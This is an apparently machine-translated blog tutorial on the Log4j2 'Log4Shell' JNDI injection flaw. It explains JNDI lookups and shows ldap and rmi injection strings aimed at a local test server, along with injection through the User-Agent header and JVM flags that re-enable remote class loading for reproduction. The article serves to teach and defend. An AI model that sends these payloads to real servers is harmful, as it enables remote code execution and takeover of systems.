background
Log4j2 is a “nuclear bomb” vulnerability. This vulnerability is called a “nuclear bomb” vulnerability. This article takes you step by step to understand the principle of this vulnerability, how to use it and how to affect the scope of it.
Basic knowledge of
JAVA provides a powerful Lookup function that relies heavily on JNDI
JNDI is Java Naming and Directory Interface (Java Naming and Directory Interface), which provides a Directory system and associates service names with objects, enabling developers to access objects using names during development.
JNDI is just a top layer wrapper, and the bottom layer supports all kinds of access, including RMI and LDAP, which are often seen in other articles. For what RMI and LDAP are, you can see in other articles. It is simply a rich data source, passing in a name, and lookup back the corresponding object.
Vulnerability principle
For the following simple code,log4j2 resolves JNDI, loads classes by lookup, instantiates objects, and performs malicious logic (such as deleting files, etc.)
LOGGER.error("${jndi: ldap: / / 127.0.0.1:1389 / badClassName}");
Copy the codeReferring to common business code on the web, it is very likely that the application will print common attributes such as User-Agent, resulting in JNDI injection vulnerabilities
String userAgent = request.getHeader("User-Agent"); \ logger.info(userAgent);Copy the codeThe attacker inUser-AgentFill in theThe ${jndi: ldap: / / 127.0.0.1:1389 / badClassName}, can constitute injection, visible its threshold of low
As you can see from the picture, the object of JNDI injection vulnerability can be RMI or LDAP, essentially because of the loading of remote code, allowing an attacker to take advantage of Java dynamic loading is a double-edged sword.
repeat
Reproduce the code github.com/sabersword/… , provides LDAP and RMI two ways to run ServerMain to start RMI Registry, LDAP Server and HTTP Server, and then run ClientMain again to restart the calculator
LOGGER.error("${jndi: ldap: / / 127.0.0.1:1389 / badClassName}");
LOGGER.error("${jndi: rmi: / / 127.0.0.1:1099 / badClassName}");
Copy the codeIn addition to opening the calculator, can also execute any command, equivalent to the attacker has obtained the server as a user of all permissions, so extremely dangerous
Recurrence point of attention
Since trustURLCodebase, the ability to load remote classes, is turned off in some JDK versions, it is best to turn it on in ClientMain to reproduce:
-Dcom.sun.jndi.ldap.object.trustURLCodebase=true
-Dcom.sun.jndi.rmi.object.trustURLCodebase=true
Copy the codeThe specific JDK version is as follows. Source:xz.aliyun.com/t/6633
conclusion
4ra1n.love/post/hbHrd-… , and then combined with their own understanding and practice, write this article is not to teach you how to attack, but hope that we understand the vulnerability harm, recognize the weaknesses of the system, build a more secure system, mutual encouragement